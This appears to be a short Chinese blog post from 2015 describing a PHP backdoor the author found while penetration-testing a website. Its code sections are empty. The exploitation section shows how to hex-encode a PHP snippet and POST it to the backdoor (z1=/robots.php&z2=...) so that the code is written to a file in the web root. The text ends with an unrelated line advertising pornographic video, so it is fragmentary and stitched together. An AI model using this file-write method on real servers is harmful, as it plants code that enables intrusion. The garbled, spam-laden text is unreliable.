分享一款遇到的PHP后門 2015-10-16

這個后門是我在滲透某站時遇到的

代碼

代碼分析

利用方式

先把要寫入的內容URL編碼,比如:

編碼后:
%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
然后去掉里面的百分號(%)得到:
3C3F70687020706870696E666F28293B203F3E
然后給我們的后門POST內容:
z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到我們的phpinfo已經寫入到根目錄下的robots.php:

一级A片不卡在线观看